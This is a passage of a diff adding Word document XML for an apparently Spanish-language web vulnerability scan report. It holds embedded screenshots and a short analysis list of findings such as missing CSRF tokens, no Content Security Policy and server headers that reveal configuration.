+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="344661129" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3687640" cy="1745295"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B971703" wp14:editId="26DB3345">
+            <wp:extent cx="5400040" cy="3272790"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="706521087" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="706521087" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3272790"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64558ECC" wp14:editId="489A451B">
+            <wp:extent cx="5400040" cy="2644775"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="423128250" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="423128250" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2644775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="036BCCF8" wp14:editId="24E46EAE">
+            <wp:extent cx="5400040" cy="2823210"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="497210428" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="497210428" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2823210"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE8D981" wp14:editId="7EECDAA3">
+            <wp:extent cx="4848902" cy="4639322"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
+            <wp:docPr id="511056047" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="511056047" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4848902" cy="4639322"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6BDA53" wp14:editId="5FA7D5EB">
+            <wp:extent cx="5400040" cy="5285105"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1266355300" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1266355300" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="5285105"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6D4766" wp14:editId="4832CACE">
+            <wp:extent cx="5400040" cy="2274570"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2015326372" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2015326372" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2274570"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AF196F" wp14:editId="59CC8FA2">
+            <wp:extent cx="5400040" cy="3260725"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="293274182" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="293274182" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3260725"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Análisis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>No Acceso a robots.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: La aplicación web no tiene un archivo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>robots.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> accesible, lo que indica que no hay restricciones explícitas para los motores de búsqueda.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>No Anti-CSRF Tokens</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>: La aplicación web no utiliza tokens CSRF para protegerse contra ataques CSRF.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Vulnerabilidad a CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>: La aplicación web es vulnerable a ataques CSRF, lo que significa que un atacante podría forzar a un usuario a realizar acciones no deseadas en la aplicación web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>No CSP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>: La aplicación web no utiliza Content Security Policy (CSP), lo que la hace más vulnerable a ataques XSS y de inyección de datos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Información de Servidor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: El servidor está revelando información sobre su configuración a través de los encabezados HTTP </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>X-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Powered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, lo que podría facilitar la identificación de vulnerabilidades en el servidor o la aplicación web.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">User </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Agent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Fuzzer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Tienes activo un User </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Agent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
